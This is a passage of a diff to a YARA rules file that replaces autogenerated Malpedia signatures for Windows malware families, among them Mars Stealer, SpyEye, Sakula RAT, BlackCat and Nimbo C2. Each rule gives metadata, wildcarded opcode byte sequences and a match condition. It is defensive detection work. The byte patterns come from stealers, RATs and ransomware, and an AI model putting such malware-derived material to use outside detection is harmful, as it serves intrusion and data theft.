e8???????? 83c408 8b9548ffffff 83c258 52 } + $sequence_7 = { e9???????? 8d4d9c e8???????? c645fc01 8d8d38ffffff 51 8d4d9c } + $sequence_8 = { 8b4dd8 8b9130010000 52 ff15???????? 8b45d8 c7803001000000000000 8b4dd8 } + $sequence_9 = { 8d8560fbffff 50 8d8da8fdffff e8???????? 89854cf8ffff 8b8d4cf8ffff 898d48f8ffff } condition: - 7 of them and filesize <131072 + 7 of them and filesize <2080768 } -rule MALPEDIA_Win_Torrentlocker_Auto : FILE +rule MALPEDIA_Win_Nimgrabber_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "56bf47db-a6d1-5792-b5b6-3656138ac949" + id = "3ff9ecdf-434a-5531-ae47-14063d732bcc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.torrentlocker_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimgrabber_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "9124185b3dba8eb6288bd309dcd17a816c52adb0e1e08ff17bcd23b3d53099e4" + logic_hash = "d88020b2287429253ba602c12d16ae36bc236c828c7e32d50b3c884fb53a1e20" score = 75 quality = 75 tags = "FILE" @@ -134507,38 +137336,32 @@ rule MALPEDIA_Win_Torrentlocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 83f801 7405 83f802 } - $sequence_1 = { 8b0d???????? 5f c7000c000000 894804 } - $sequence_2 = { 85c0 7514 e8???????? 3d00000600 } - $sequence_3 = { 50 56 6a00 6a01 6a02 ff15???????? } - $sequence_4 = { 8b0d???????? 890e e8???????? 8bd8 e8???????? 6a00 6a01 } - $sequence_5 = { 83ec24 6a00 6a01 68???????? ff15???????? 85c0 7551 } - $sequence_6 = { 56 ff15???????? 83f802 740f 83f803 740a } - $sequence_7 = { e8???????? 3d00000600 1bc0 40 a3???????? eb05 } - $sequence_8 = { 83c002 6685c9 75f5 2bc2 d1f8 8d440014 } - $sequence_9 = { 52 50 ff15???????? 85c0 7519 8b0d???????? 51 } - $sequence_10 = { 51 6a01 6a00 0d00800000 50 6a00 } - $sequence_11 = { 8b0d???????? 5f 894e0c 5e } - $sequence_12 = { 8b0d???????? 6a00 6a00 57 } - $sequence_13 = { 48 85c0 7ff4 5f 33c0 5e c3 } - $sequence_14 = { 8b0d???????? 57 6a00 51 ff15???????? 8bc6 } - $sequence_15 = { c705????????00000000 e8???????? 8bf0 e8???????? } + $sequence_0 = { 0f8fa7000000 c7819814000000400000 b800400000 c744240c04000000 c744240800300000 39c7 0f8fd0010000 } + $sequence_1 = { 8b842490000000 83c004 89442430 0f80de2e0000 8b8424d8000000 8b00 39442430 } + $sequence_2 = { c705????????b83b4800 c705????????20000000 c705????????02000000 c705????????00254800 668915???????? c605????????01 c705????????00000000 } + $sequence_3 = { 8d4710 8d5f08 be???????? b90b000000 c743042b000000 c747082b000000 89c7 } + $sequence_4 = { c1f80c 89442418 89e8 0fb6c0 8d0483 8944241c 8b8084100000 } + $sequence_5 = { 7f0d b9???????? e8???????? 8b4514 83e801 0f8067160000 894514 } + $sequence_6 = { c70424???????? 894c2474 89542404 e8???????? 8b4c2474 31c0 894b04 } + $sequence_7 = { 8b6f04 81fd0000003f 7e28 c704240000003f 89fa 89f1 e8???????? } + $sequence_8 = { 89f9 e8???????? 8b4c2454 89da e8???????? 8b07 } + $sequence_9 = { 740a 8b0b 85c9 0f88a6020000 e8???????? 31ed 89442430 } condition: - 7 of them and filesize <933888 + 7 of them and filesize <1238016 } -rule MALPEDIA_Win_Taidoor_Auto : FILE +rule MALPEDIA_Win_Unidentified_099_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ede5ce97-d13f-50cf-a7ae-7678b51deb4c" + id = "855e4e32-6d4e-59ad-a575-6df1a0196662" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taidoor_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_099_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "9a08978fbb3ba0f91c4ac24abe796c18c68bd8ea90cbb67ac44eb5676631b436" + logic_hash = "258a0ad9f77598150260878a992142883eda125a250cf06189b6139c76537e6e" score = 75 quality = 75 tags = "FILE" @@ -134552,32 +137375,32 @@ rule MALPEDIA_Win_Taidoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7cf5 c745fcfcffffff 33ff 33db } - $sequence_1 = { f775fc 8bf2 8d04f6 ffb485f4b7ffff ff15???????? 85c0 } - $sequence_2 = { 59 8d85a0fdffff 59 50 e8???????? } - $sequence_3 = { 57 a0???????? c745fc01000000 8ac8 f6d9 1bc9 33db } - $sequence_4 = { 66ab aa 895dfc ffd6 40 85c0 7e29 } - $sequence_5 = { b940420f00 f7f9 8d45e0 52 ff35???????? ff35???????? } - $sequence_6 = { ff75f0 ffd6 8d4d08 885dfc e8???????? 834dfcff 8d4d10 } - $sequence_7 = { ff75ec 8d4df0 e8???????? 8b450c 46 3b70f8 7cdc } - $sequence_8 = { e8???????? ff75ec 8d85a0fdffff 50 51 8bcc 8965f4 } - $sequence_9 = { bf80020000 57 c745fc01000000 ffd3 8bf0 } + $sequence_0 = { 4d8bc4 418bd6 498bcf e8???????? 4c8d8df0010000 458bc6 498bd7 } + $sequence_1 = { 488d4808 e8???????? 488d057dec0000 488903 488bc3 } + $sequence_2 = { 488d0deb1effff 48c1e602 0fb784b910600100 488d9100570100 488d8d24030000 4c8bc6 4803cb } + $sequence_3 = { 0fb6842930ef0100 4883c103 8802 488d5201 4881f959010000 7ce5 4533c9 } + $sequence_4 = { 443820 75e4 8bca ffc2 4803c9 } + $sequence_5 = { 488bd6 488be8 4d8d4715 488d442468 488bcd 4889442420 e8???????? } + $sequence_6 = { 85c0 7424 8b15???????? 33c0 85d2 7418 } + $sequence_7 = { 488d5b01 4883ef01 75d8 33c0 488dbdf0010000 } + $sequence_8 = { ba02000000 660f1f440000 488d8980000000 0f1000 0f104810 } + $sequence_9 = { c7442470fedcba98 c744247476543210 660f1f440000 49ffc0 42803c0000 75f6 488d55d0 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <314368 } -rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE +rule MALPEDIA_Win_Scieron_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "edb23d28-51bf-5c0e-a6f1-7bed7d79f2ed" + id = "f9adad1f-0463-5c84-9844-b56939af8a07" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gh0sttimes_auto.yar#L1-L163" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scieron_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "cd1718bc24ef159d263847a726492a25887a81e094fffc2e2f0e4d7ba74c2151" + logic_hash = "0253954720ef9ca79516bb585b52e8d461b9169ed80f649da26edf6b8044019f" score = 75 quality = 75 tags = "FILE" @@ -134591,40 +137414,34 @@ rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 899df0fdffff 899decfdffff 889df4fdffff 889df5fdffff 889df6fdffff 889df7fdffff 889df8fdffff } - $sequence_1 = { 52 50 8985dcfdffff e8???????? } - $sequence_2 = { 50 ff15???????? 85c0 750f 5b } - $sequence_3 = { 33c5 8945fc 8b4508 53 33db 8d8de0fdffff 51 } - $sequence_4 = { 0f852c010000 b8???????? 8d5001 8d642400 } - $sequence_5 = { 8b0e 51 ff15???????? 43 } - $sequence_6 = { 6a09 8d4df0 c645f070 8945f5 e8???????? 8b4dfc 5f } - $sequence_7 = { 0f8638010000 83c708 8b57fc 8b85ecfdffff 52 } - $sequence_8 = { 488b4c2438 488d442430 488d150c710200 4889442428 } - $sequence_9 = { 488b4c2438 488d442434 4c8d4c2430 4889442428 488d442440 488d1520790200 } - $sequence_10 = { 488b8f40010000 ff15???????? 488b8f40010000 ff15???????? 48c78740010000ffffffff } - $sequence_11 = { 488b4c2430 488b4968 e8???????? 4c8b5c2430 } - $sequence_12 = { 488b4c2430 83490c08 a808 7409 488b442430 83480c04 } - $sequence_13 = { 488b4c2430 48c1e80c f7d0 334108 } - $sequence_14 = { 488b4c2438 488d442430 488d15da700200 4889442428 } - $sequence_15 = { 488b4c2430 488b4968 33c0 66890451 488b442430 } + $sequence_0 = { 8bc6 ff75f8 e8???????? 59 59 } + $sequence_1 = { 57 ff7508 8d859cf9ffff 68???????? } + $sequence_2 = { 68???????? ff15???????? 50 ffd3 ffd0 807d0c02 742a } + $sequence_3 = { 8bec 83e4f8 b81c800000 e8???????? 53 } + $sequence_4 = { 897574 ff15???????? 8d4574 50 56 56 } + $sequence_5 = { eb65 8b4734 50 894574 8d472c 50 } + $sequence_6 = { 8bf8 85ff 7418 8d45fc } + $sequence_7 = { 40 40 663938 75df } + $sequence_8 = { 033e 68???????? 68???????? ff15???????? } + $sequence_9 = { 83a61c02000000 33c0 40 5f 5d } condition: - 7 of them and filesize <548864 + 7 of them and filesize <100352 } -rule MALPEDIA_Win_Vawtrak_Auto : FILE +rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b724e7c8-fa8b-5ecb-9091-2adfef543aee" + id = "b16102ee-c7a4-5abc-870b-b75814e7493c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vawtrak_auto.yar#L1-L212" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphical_neutrino_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "2420d7270c56567b74aa80afdfcc3b5893cd81eeb0dabc0a53855a9b85be220c" + logic_hash = "650397c4d3167e6ec1c66b8947fe66982f57b8190e3a878616091180b7325b66" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -134636,47 +137453,73 @@ rule MALPEDIA_Win_Vawtrak_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a01 ff35???????? 6a04 6a01 50 ff15???????? 85c0 } - $sequence_1 = { 6a00 6a00 e8???????? 50 ff15???????? } - $sequence_2 = { 837d1040 752d 8b4d04 e8???????? 85c0 } - $sequence_3 = { 8b4d08 e8???????? 85c0 7415 ff15???????? 50 } - $sequence_4 = { ba00ff0000 8bc1 23c2 3bc2 } - $sequence_5 = { 750f 33c9 e8???????? 85c0 7404 } - $sequence_6 = { b8ff0f0000 6623e8 b800400000 660be8 } - $sequence_7 = { 6a08 68???????? 56 ffd7 85c0 } - $sequence_8 = { 50 ff15???????? a3???????? 85c0 74e7 } - $sequence_9 = { 7528 68???????? ff15???????? 85c0 7504 33c0 } - $sequence_10 = { 59 57 8bf0 ff15???????? 8bc6 } - $sequence_11 = { e8???????? 33d2 b9ff3f0000 f7f1 } - $sequence_12 = { 8bc6 8703 3bc6 74f8 } - $sequence_13 = { 56 6a04 53 57 } - $sequence_14 = { 7705 80ea61 eb0a 8d42bf } - $sequence_15 = { 03c1 8b4d14 8901 33c0 40 } - $sequence_16 = { e9???????? 8ac1 c1e904 c0e004 } - $sequence_17 = { 8ac8 240f 80e1f0 80c110 32c8 } - $sequence_18 = { 3c41 7c11 3c46 7f0d } - $sequence_19 = { 48397c2430 7505 bb01000000 8bc3 } - $sequence_20 = { 4885c0 7440 ff15???????? 488b0b 33ff 3db7000000 } - $sequence_21 = { 0f84ff000000 3d00010000 7320 488b0b } - $sequence_22 = { 420fb61408 8bc1 ffc1 42881408 } + $sequence_0 = { 4489c7 4889f2 48c7410800000000 4531c0 4889d9 4c8d6c2450 e8???????? } + $sequence_1 = { ff15???????? 4883fe10 7f1c 41b828400000 } + $sequence_2 = { 48c78424c800000002000000 48898424c0000000 e8???????? 4c8da424c0000000 488d842460050000 48c78424c800000002000000 } + $sequence_3 = { eb07 b001 80fa09 7478 } + $sequence_4 = { 8806 488d4602 885601 eb2d b964000000 } + $sequence_5 = { 53 4883ec20 4c8b6108 4889cb 4c3b6110 740f } + $sequence_6 = { ebcc 31db 4c89ea 4c89e1 4189de ffc3 } + $sequence_7 = { 7430 c605????????01 31c0 8a1403 881406 48ffc0 4883f81f } + $sequence_8 = { 4155 4154 53 4883ec20 c60100 4889cb 4989d5 } + $sequence_9 = { bd07000000 eb32 41b9a0860100 bd06000000 eb25 41b910270000 bd05000000 } + + condition: + 7 of them and filesize <674816 +} +rule MALPEDIA_Win_Blackcat_Auto : FILE +{ + meta: + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "64552e7e-a42b-5e42-ac85-4cf9a6355d18" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackcat_auto.yar#L1-L120" + license_url = "N/A" + logic_hash = "2fe3958ae160b549a525be2a75569af9cb09940744adfe7a2969b920b4e1603b" + score = 75 + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { c3 894608 c7460400000000 b001 ebe8 89c2 } + $sequence_1 = { 7260 8b06 01d8 51 57 50 89cf } + $sequence_2 = { 8975dc 8955e0 eb07 31c0 b902000000 } + $sequence_3 = { b104 eb0f e8???????? 89c2 c1e018 31c9 } + $sequence_4 = { 7504 3c02 7351 88c4 8975cc } + $sequence_5 = { 81f9cf040000 0f8fe4000000 81f96b040000 0f84b4010000 81f976040000 } + $sequence_6 = { 83ec08 a1???????? c745f800000000 c745fc00000000 85c0 7408 8d4df8 } + $sequence_7 = { 8d45f8 50 e8???????? 8b45f8 8b55fc 83c408 } + $sequence_8 = { 895804 897008 eb0b 8b45e8 894708 } + $sequence_9 = { ff45e4 8a02 42 8955e8 } condition: - 7 of them and filesize <1027072 + 7 of them and filesize <29981696 } -rule MALPEDIA_Win_Sakula_Rat_Auto : FILE +rule MALPEDIA_Win_Nimbo_C2_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "877a5bc8-1502-5d2d-ac89-d1f9991b4673" + id = "89998246-cbee-55ef-81ba-46cc3fd70d1a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sakula_rat_auto.yar#L1-L234" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimbo_c2_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "5566117feff4531b6238852b1dd267d13dd172e7c51c8c4e9976cadb5e493558" + logic_hash = "8c39050d61f289d245bf6365ffd110e7ad73787b347fdf5526ee916f50a01d10" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -134688,45 +137531,32 @@ rule MALPEDIA_Win_Sakula_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6800010000 6a00 6a00 68???????? } - $sequence_1 = { 8bf0 56 6a01 57 53 } - $sequence_2 = { 57 56 e8???????? 8d7e10 8ad8 57 8bc7 } - $sequence_3 = { 33c9 85f6 7e15 8a0411 84c0 7409 } - $sequence_4 = { 53 e8???????? 83c40c 6a00 6a00 57 53 } - $sequence_5 = { 8bc7 e8???????? 83c408 833e01 } - $sequence_6 = { 50 e8???????? 83c404 32c0 5d } - $sequence_7 = { 53 e8???????? 56 e8???????? 83c41c 5f 5b } - $sequence_8 = { 66895db0 48895c2450 4889442458 4889442460 } - $sequence_9 = { ff15???????? 33d2 488bcb ff15???????? e8???????? 33c9 ff15???????? } - $sequence_10 = { 8b45d8 8b5de0 01d8 8945e0 6a01 e8???????? } - $sequence_11 = { 4c8bc6 33d2 33c9 448bc8 897c2428 48895c2420 ff15???????? } - $sequence_12 = { 0f8516010000 488d15e61c0000 41b804010000 48890d???????? ff15???????? ff15???????? 83f801 } - $sequence_13 = { 7459 68???????? 68???????? e8???????? 83f800 } - $sequence_14 = { 8945e4 83f800 0f843c010000 6a00 6a00 ff75ec } - $sequence_15 = { e8???????? 50 ff75f4 e8???????? 58 eb02 31c0 } - $sequence_16 = { 8a03 3c00 7414 b21a } - $sequence_17 = { ff15???????? 33d2 488d4deb 448d426c } - $sequence_18 = { ff15???????? 488bce 488bd8 ff15???????? 488364243800 488364243000 } - $sequence_19 = { e9???????? 31c0 7402 31c0 50 ff75fc e8???????? } - $sequence_20 = { ff9080000000 3bc6 741b 488b4dc7 488b01 } - $sequence_21 = { 6804010000 ff75fc 6a00 e8???????? ff75fc } - $sequence_22 = { 33d2 ff15???????? 3bc6 745f 4c8d4dcf } + $sequence_0 = { 741a 488b4960 ba22000000 e8???????? 488d4b60 4889c2 e8???????? } + $sequence_1 = { 7434 498b07 b902000000 4899 48f7f9 498b17 31c9 } + $sequence_2 = { e8???????? 4883c470 5b 5e 5f 415c 415d } + $sequence_3 = { 488b4c2428 84c0 740f 4883c430 415c 415d 415e } + $sequence_4 = { 4889f1 4889442420 e8???????? 48ff4608 4883c440 5b 5e } + $sequence_5 = { 7d45 eb49 488b4a10 488b5218 48894810 4889d9 48895018 } + $sequence_6 = { 4d8b2c24 31ff 4c39ef 7de9 498b54fc10 4889f1 48ffc7 } + $sequence_7 = { e8???????? 31d2 4c89e1 498907 e8???????? 4c89e9 488906 } + $sequence_8 = { c1fa0c 83e23f 83ca80 885012 89da 83e33f c1fa06 } + $sequence_9 = { 807c33102d 0f94c0 48ffc6 ebd4 4c89e0 4883c428 5b } condition: - 7 of them and filesize <229376 + 7 of them and filesize <1141760 } -rule MALPEDIA_Win_Ghole_Auto : FILE +rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4005edf0-acd5-5930-97fb-055e6ab03b5d" + id = "c0d84b8c-dd86-5e0b-b294-081ee84952b7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghole_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptic_convo_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "a19f9cff11c120a5d0a63f0160508dc83f879d2586d9f0ffa0e72d02e6aa023f" + logic_hash = "39890a4d7eaef0b28d86a0d6d65ec4ed011fdfc3e00013a201ada7ffacfd1cd9" score = 75 quality = 75 tags = "FILE" @@ -134740,32 +137570,32 @@ rule MALPEDIA_Win_Ghole_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740d 8b55fc 48 8b45e8 89908c000000 48 8b55e0 } - $sequence_1 = { 3b45ec 7591 48 8b05???????? 48 8b00 8b15???????? } - $sequence_2 = { 89c7 e8???????? 85c0 0f85ac160000 8b850cfdffff 48 8d9518fdffff } - $sequence_3 = { 90 8b4dc8 8b55c4 48 8b5d98 48 8b4598 } - $sequence_4 = { 8910 48 8b45e8 48 83c018 48 8b55e8 } - $sequence_5 = { 85c0 7518 8b45e0 89c7 e8???????? 85c0 750a } - $sequence_6 = { 48 8b45e0 48 895010 48 8d55d4 48 } - $sequence_7 = { 894c2408 48 83ec78 c744242050000000 c744242403000000 48 8d0540feffff } - $sequence_8 = { 4c 8945c0 c745ec00000000 8b05???????? 85c0 750a b800000000 } - $sequence_9 = { 0f847d0f0000 48 8d95a0faffff 48 8d8520fdffff 48 89d6 } + $sequence_0 = { 8bf8 ffd6 85ff 7515 8d45e8 68???????? } + $sequence_1 = { 75f9 8dbddcfaffff 2bc2 4f 8a4f01 } + $sequence_2 = { 399e88000000 7445 399e8c000000 743d 6a40 6800300000 ff7510 } + $sequence_3 = { c20400 0fb7442404 ff742408 50 e8???????? c20800 } + $sequence_4 = { 50 6a01 6a00 68???????? 57 ffd3 85c0 } + $sequence_5 = { a4 33c0 8a88d0474000 884c05e8 40 84c9 } + $sequence_6 = { f3a4 8dbddcfaffff 4f 8a4701 47 84c0 75f8 } + $sequence_7 = { 85c0 7407 c605????????01 be???????? 8d7d98 a5 66a5 } + $sequence_8 = { 894584 ffd6 53 57 89458c ff15???????? } + $sequence_9 = { 8d45c8 66a5 50 53 } condition: - 7 of them and filesize <622592 + 7 of them and filesize <97280 } -rule MALPEDIA_Win_Mars_Stealer_Auto : FILE +rule MALPEDIA_Win_Kutaki_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d22235ef-5968-5e10-be47-3cfb22c5f1b3" + id = "09920faf-098e-5e77-9216-3a3bfa3a1490" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mars_stealer_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kutaki_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "b25b9578c7efb2902b746c00b6410a6cd2ad1c64e90ea264af3674a130d6b800" + logic_hash = "cdd66e692bdc9daff0e282b4897c4e9339c8de45be71e54a60a94829ea33b905" score = 75 quality = 75 tags = "FILE" @@ -134779,71 +137609,71 @@ rule MALPEDIA_Win_Mars_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33049508674100 894508 8b4d0c 83c101 894d0c 8b550c } - $sequence_1 = { 8b5118 52 8b853cfbffff 8b4814 } - $sequence_2 = { 898564e6ffff 83bd64e6ffff00 0f8405030000 6a00 } - $sequence_3 = { a1???????? 50 8b4d08 51 e8???????? 83c410 6a04 } - $sequence_4 = { 8b5508 c1ea08 33148d08674100 895508 8b450c } - $sequence_5 = { 52 8d85e8feffff 50 68???????? 8b4df8 51 } - $sequence_6 = { 837df820 0f8d61030000 6804010000 8d8de8feffff 51 e8???????? } - $sequence_7 = { 2b4d08 c681407c410000 8b550c 8955f8 } - $sequence_8 = { 8b953cfbffff 8b4214 83c020 50 6a00 } - $sequence_9 = { 52 8b85fcfbffff 50 ff15???????? 89857cdeffff } + $sequence_0 = { 52 6a01 6880000000 ff15???????? 83c41c c745fc0c000000 } + $sequence_1 = { 0f803a020000 8b450c 8910 e9???????? } + $sequence_2 = { ff15???????? 898528ffffff eb0a c78528ffffff00000000 8d4dc8 ff15???????? } + $sequence_3 = { ff15???????? 898568feffff eb0a c78568feffff00000000 8b459c 50 ff15???????? } + $sequence_4 = { c745fc3c000000 660fb64dd8 6683e10f 666bc910 0f80c9020000 660fb645c8 6699 } + $sequence_5 = { 8d4580 50 ff15???????? 8985d4feffff 6aff 8b8dd4feffff 8b11 } + $sequence_6 = { 8b45bc 50 8b4db8 51 ff15???????? 898540ffffff } + $sequence_7 = { c745fc08000000 6a74 8d855cffffff 50 ff15???????? 6a65 8d8d4cffffff } + $sequence_8 = { 50 68???????? ff15???????? 85c0 0f85bc000000 c745fc1a000000 } + $sequence_9 = { 52 ff15???????? 898550ffffff 8b4508 } condition: - 7 of them and filesize <219136 + 7 of them and filesize <1335296 } -rule MALPEDIA_Win_Unidentified_075_Auto : FILE +rule MALPEDIA_Win_Zumanek_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "147c0d53-aecb-5cae-ac7f-14d52d3c203f" - date = "2023-07-11" - modified = "2023-07-15" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_075_auto.yar#L1-L115" + id = "87aee693-fd24-5045-ad68-bbf967fca577" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zumanek_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "10617fdfd534147bc5e0f7e922724e69d45c37af66d21f98c629fa1bac685120" + logic_hash = "692948458546aa7f1172f720f7a047815fbd39df276c694923c84a71f1135e40" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230705" - malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" - malpedia_version = "20230715" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c40c 6808020000 8d95dcf6ffff 52 6a00 } - $sequence_1 = { 8bc1 5e 5d c3 55 8bec ff15???????? } - $sequence_2 = { 52 e8???????? 6a00 8d85ace6ffff 50 8d8dbceeffff 51 } - $sequence_3 = { 83c40c 33c0 668985d4f4ffff 6806020000 } - $sequence_4 = { 837d9400 740d 8b55fc c7821002000000000000 837df000 } - $sequence_5 = { 52 ff15???????? 83c410 b853000000 66898550ffffff } - $sequence_6 = { 33c0 668945d0 8d4dd4 51 } - $sequence_7 = { 742c 8b4514 85c0 7421 } - $sequence_8 = { 85c0 0f8431ffffff b901000000 85c9 0f8515ffffff } - $sequence_9 = { 81eca4000000 894dfc c745f400000000 c745f800000000 } + $sequence_0 = { fc 81fe382e9330 97 e412 3dd16312c9 103f 0800 } + $sequence_1 = { 8802 98 811212242434 48 3c91 4a } + $sequence_2 = { 894612 4d 2454 48 5b 91 } + $sequence_3 = { 71ef 1a6f35 e30b 5d fc 77f2 f1 } + $sequence_4 = { 1dba45e22f 91 7c8b e459 0920 122424 } + $sequence_5 = { 386b95 4c 53 196a17 } + $sequence_6 = { 4a e8???????? 86b71986f742 06 58 4c 8812 } + $sequence_7 = { c101f6 53 32b879629b65 76a2 43 fc } + $sequence_8 = { d9c3 ab 5f c50f 9d 54 f233591b } + $sequence_9 = { 5a c59cd53a93a658 98 9f f5 6b80e7fa856bb2 55 } condition: - 7 of them and filesize <393216 + 7 of them and filesize <58867712 } -rule MALPEDIA_Win_Spyeye_Auto : FILE +rule MALPEDIA_Win_Montysthree_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4b228779-0f96-5a8e-b676-8a6d855d1452" + id = "5df0d300-da50-5a49-9998-41d773ee6c8b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spyeye_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.montysthree_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "54f45a6b713b51a15663c9347e916cec35361fbd1f12608b97d32ef9d0a49fb7" + logic_hash = "00fdc41dcd00cadf758a1f9a8aa235f12bbf1e307fd238ef7d6a32ae7dd0988d" score = 75 quality = 75 tags = "FILE" @@ -134857,32 +137687,32 @@ rule MALPEDIA_Win_Spyeye_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4de8 51 